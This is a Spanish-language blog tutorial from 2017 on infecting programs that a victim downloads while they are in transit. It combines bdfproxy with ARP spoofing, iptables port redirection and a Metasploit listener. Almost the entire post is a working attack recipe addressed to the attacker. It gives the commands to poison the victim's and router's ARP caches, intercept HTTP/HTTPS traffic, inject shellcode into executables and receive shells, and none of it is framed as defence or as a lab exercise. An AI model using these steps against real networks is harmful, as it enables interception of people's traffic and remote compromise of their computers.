lunes, 17 de julio de 2017

Tutorial bdfproxy

En este nuevo post, vamos a hacer que, cuando una víctima se descargue un programa, poder infectarlo al vuelo (mientras se lo descarga).

PDFProxy, lo que hace, es buscar code caves en la cabecera PE del ejecutable en las que quepa el código de la shell, lo inyectará y lo dejará preparado para que, posteriormente, se continúe cargando el programa infectado volviendo de nuevo a los registros pertinentes.

apt-get install mitmproxy

Si sale un error sobre dradis, hay que desinstalar dradis: apt-get purge dradis


apt-get install bdfproxy

Instalamos también

apt-get install python-openssl
apt-get install openssl

Editamos el archivo de configuración de bdf proxy (bdfproxy.cfg) y lo configuramos a nuestro modo, cambiando la dirección IP que viene por la nuestra.

También, ponemos la opción:

proxymode=transparent

Guardamos y cerramos.

Preparamos el ataque mitm:

echo 1 > /proc/sys/net/ipv4/ip_forward

En otra ventana:

Configuramos el firewall:

iptables --flush

iptables --table nat --flush

iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 443 -j REDIRECT –to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 8443 -j REDIRECT –to-port 8080

Realizamos el envenenamiento arp:

arpspoof -i eth0 -t ipvictima iproutet

En otra ventana:

arpspoof -i interfazdered -t iprouter ipvictima

Abrimos una nueva terminal

Ejecutamos bdfproxy:

bdfproxy

Nos ha creado el archivo /etc/bdfproxy/bdf_proxy_resource.rc que es una especie de script que nos configura metasploit para preparar la escucha.

En una ventana nueva ejecutamos metasploit con el archivo indicado anteriormente.

msfconsole -r /etc/bdfproxy/bdfproxy/bdf_proxy_resource.rc

Cuando la víctima se descargue el programa, se autoinyectará



No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.